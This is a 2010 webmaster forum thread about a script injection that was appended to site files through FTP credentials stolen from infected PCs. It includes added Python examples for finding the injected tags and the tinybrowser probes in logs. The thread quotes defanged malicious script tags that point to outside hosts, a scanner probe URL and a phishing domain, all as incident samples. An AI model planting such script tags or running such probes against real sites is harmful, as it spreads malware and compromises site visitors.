
Webmaster General Forum

    
What is the origin/cause of this injection?
rocknbil




msg:4169545
 9:56 pm on Jul 13, 2010 (gmt 0)

Came across this today with a client's site I'm subcontracting for.

<script type="text/javascript" src="hxxp://example.com:8080/anyfile.js"></script>
<!--123blahblah-unique-identifier-here45678-->

Pages with it are attempting to install malware (of course.)

I've seen it on a bluehost instance, other reports are jumping on goDaddy and other hosting services, so it's obviously not a specific host problem.

This instance has a modX CMS, but have read blogs about it attacking WordPress, so it's not specific to software.

This site is using Cpanel, but have read some reports of some users using other control panels.

The domain names vary, the file names vary, but the one hitting this site WAS found when Googled (it's not anyfile.js)

I read many comments ranging from a compromised DNS modification using credentials of someone's compromised computer to a database injection - which really seems to be the only common thread between the various reports, a database.

All of the documents I read searching it down were recent, like YESTERDAY, not three year old posts. Though the attack isn't new, this round of it appears to be.

My AVG blocked it immediately, and I'm still digging around on this site, in the database, etc., just wondering if anyone recognizes it and knows its point of entry.

 

rocknbil




msg:4170162
 7:45 pm on Jul 14, 2010 (gmt 0)

Database clean.

tiny_mce is on the site, and nearly all .js files were modified, most index.html/.php files modified, with code appended to the tail of the content of whatever was on the page.

All passworded accounts - CPanel, FTP, etc. changed, cleaned up over 500 instances of the code . . . it hasn't been back, yet.

Found some stuff on vulnerabilities in tiny_mce, but nothing definitive and very old documents, beginning to wonder if tiny_mce was the culprit or as I said, compromised computer of prev. developer. Still digging for the cause of the hack but the client is extremely happy. Today. :-)

coopster




msg:4170279
 12:20 am on Jul 15, 2010 (gmt 0)

FTP. 9 times out of 10 it was a client pc issue and they exposed their FTP credentials to the virus on their own pc, or the pc of anybody else that has access to the site.

rocknbil




msg:4170307
 1:48 am on Jul 15, 2010 (gmt 0)

Thanks, that's what I figured but had read a lot of vague info pointing to tiny_mce as a possible cause and wondering if I was missing something. The mods/support at their forum don't seem to show any indication of a problem.

I was "kinda tipped off" by the client claiming they can't get ahold of the original developer. His comp is probably in a black hole somewhere . . .

Dijkgraaf




msg:4171137
 11:48 pm on Jul 15, 2010 (gmt 0)

Hi Rocknbill

I saw some bot scanning for the following recently.
So possibly there is a vulnerability there.

GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0

Searching for the above got me a page about the Metasploit Framework.

Do you see something like the above in your web logs?
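
Added example (not part of Dijkgraaf's post): one way to answer that question from an Apache/nginx access log is to group requests for the quoted tinybrowser.php path by client and separate 404 probes from 2xx responses. The log lines, IP addresses and function names below are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache/nginx common or combined log format: ip, time, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
PROBE_TAIL = "/tinybrowser/tinybrowser.php"  # end of the path quoted in the post

def tinybrowser_requests(lines):
    """Group requests for tinybrowser.php by client: {ip: [(time, method, status)]}."""
    by_ip = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip, when, method, target, status = m.groups()
        # Drop the query string, decode %xx escapes, and compare case-insensitively.
        path = unquote(urlsplit(target).path).lower()
        if path.endswith(PROBE_TAIL):
            by_ip[ip].append((when, method, int(status)))
    return dict(by_ip)

def needs_followup(by_ip):
    """Clients that received a 2xx: the script exists and answered, so look closer."""
    return sorted(ip for ip, reqs in by_ip.items()
                  if any(200 <= status < 300 for _, _, status in reqs))

# Constructed sample lines (documentation IP ranges), not from a real log.
_P = "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php"
_ENC = _P.replace(".php", "%2Ephp")  # same path with an escaped dot
SAMPLE_LOG = [
    f'192.0.2.10 - - [15/Jul/2010:23:40:01 +0000] "GET {_P}?type=file&folder= HTTP/1.0" 404 209',
    f'192.0.2.10 - - [15/Jul/2010:23:40:02 +0000] "GET {_ENC}?type=file&folder= HTTP/1.0" 404 209',
    f'198.51.100.7 - - [15/Jul/2010:23:41:12 +0000] "GET {_P}?type=file&folder= HTTP/1.0" 200 5120',
    '203.0.113.5 - - [15/Jul/2010:23:42:00 +0000] "GET /index.php HTTP/1.1" 200 1043',
]

if __name__ == "__main__":
    hits = tinybrowser_requests(SAMPLE_LOG)
    for ip, reqs in hits.items():
        print(ip, reqs)
    print("2xx responses, check these first:", needs_followup(hits))
```

A site that returns only 404 for this path was scanned but does not serve the file; a 2xx means the file is present and the surrounding requests from that client deserve a closer read.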

adrianTNT




msg:4182709
 7:30 pm on Aug 5, 2010 (gmt 0)

I was also affected by this same type of malware as above,

<script type="text/javascript" src="hxxp://example.RU/anyfile.js"></script>
<!--123blahblah-unique-identifier-here45678-->

Sites on two different servers were affected so I do not think it started by a script/backdoor on the server.
I do not use wordpress on affected sites.

I clicked a link inside an email; it was made to look like it came from Vimeo ("Vimeo Registration Confirmation") but it did not. The malware email link pointed to webwinkelnurlaila[DOT]nl (I hope it is OK to post the link).
Clicking that link showed a system error about an EXE not being found (like on the local computer); the computer acted strange so I did a system restore.

I had FTP info saved in Adobe Dreamweaver so I think that is how it modified my remote files.

It affected index.html, index.php and many .js files, in all files it added links to js files inside .ru URLs.

If we do not save FTP info then we are exposed to keyloggers.

The modification dates of the changed files were all within a period of around 2 hours (before I did a system restore locally in XP), so I was able to search remote files by date modified and I found all modified files.

Changed FTP password on affected sites too, I hope it will not come back.
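
Added example (not part of adrianTNT's post): the cleanup described in this thread, run against a local copy of the webroot. It flags index/.php/.js files whose tail contains an external script tag followed by an HTML comment marker, then lists every file modified in the same time window. Function names, the 2048-byte tail, the 10-minute slack and the sample tree are assumptions made for this sketch.

```python
import os
import re
from pathlib import Path

SUFFIXES = {".html", ".htm", ".php", ".js"}
TAIL_BYTES = 2048  # the posts report the code appended at the tail of each file
# External <script src=...> followed directly by an HTML comment marker.
# "hxxp" is accepted so the defanged samples quoted in the thread also match.
INJECT_RE = re.compile(
    rb"<script[^>]*\bsrc=[\"']h(?:tt|xx)ps?://([^/\"':]+)[^\"']*[\"'][^>]*>"
    rb"\s*</script>\s*<!--[^>]*-->", re.I)

def find_injected(root):
    """Return [(relative path, script host, mtime)] for files whose tail matches."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUFFIXES:
            continue
        with open(path, "rb") as fh:
            fh.seek(max(0, path.stat().st_size - TAIL_BYTES))
            m = INJECT_RE.search(fh.read())
        if m:
            host = m.group(1).decode("ascii", "replace")
            hits.append((path.relative_to(root).as_posix(), host, path.stat().st_mtime))
    return hits

def same_window(root, hits, slack=600):
    """Files of any type modified within the hits' mtime span (+/- slack seconds)."""
    if not hits:
        return []
    lo = min(h[2] for h in hits) - slack
    hi = max(h[2] for h in hits) + slack
    return [p.relative_to(root).as_posix() for p in sorted(Path(root).rglob("*"))
            if p.is_file() and lo <= p.stat().st_mtime <= hi]

def build_sample(root, t0=1281000000):
    """Constructed sample tree: two injected files, one old clean file, one extra."""
    tail = (b'<script type="text/javascript" src="hxxp://example.com:8080/anyfile.js">'
            b'</script>\n<!--123blahblah-unique-identifier-here45678-->\n')
    files = {"index.php": (b"<?php echo 'hi'; ?>\n" + tail, t0),
             "js/menu.js": (b"var a = 1;\n" + tail, t0 + 3600),
             "about.html": (b"<html><body>About</body></html>\n", t0 - 90 * 86400),
             "img/x.gif": (b"GIF89a", t0 + 1800)}
    for name, (data, mtime) in files.items():
        p = Path(root, name)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
        os.utime(p, (mtime, mtime))
```

Call `find_injected()` on the downloaded copy first, then `same_window()` with its result: files that fall in the window without matching the pattern (here `img/x.gif`) are the ones to inspect by hand.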

rocknbil




msg:4183678
 7:07 pm on Aug 7, 2010 (gmt 0)

"Do you see something like the above in your web logs?"


I'm always called in afterwards, and the cases I've looked at are on shared hosting with one of those logs that are only there if you turn them on. Which the owners don't have the foresight to do.

"Clicking that link showed a system error about an EXE not being found"


What you should have gotten was an alert threat by your AVG, unless this particular bug wasn't in your database yet. I think you just might have contracted it. Some of these things can persist through restores (I have heard, not experienced) so just stay on your toes, hard to say if you're safe or not.

adrianTNT




msg:4183682
 7:23 pm on Aug 7, 2010 (gmt 0)

I used "Avast free" at the time I got infected.

Good to know: My iTunes account was hacked today, it was a hard week for me :)

I used to laugh at people that get their info stolen, accounts hacked, etc and now it is happening to me.

The thief ordered around $50 from iTunes store using the saved PayPal info at iTunes.

I want to believe these two were not related but there is a chance that the virus sends actual passwords to their masters and later they try to login to iTunes, PayPal, FaceBook, popular services, etc.
My iTunes password was weak though. And if an actual thief had the passwords I use, I am thinking I would see damages to servers and paypal first, before iTunes.
Also, I found many users complaining about their accounts being hacked.
I didn't use iTunes for months, so it was not by KeyLoggers or password saved on computer.

incrediBILL




msg:4190406
 3:03 am on Aug 22, 2010 (gmt 0)

Avast free doesn't have web protection.

Being cheap got you hacked.

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved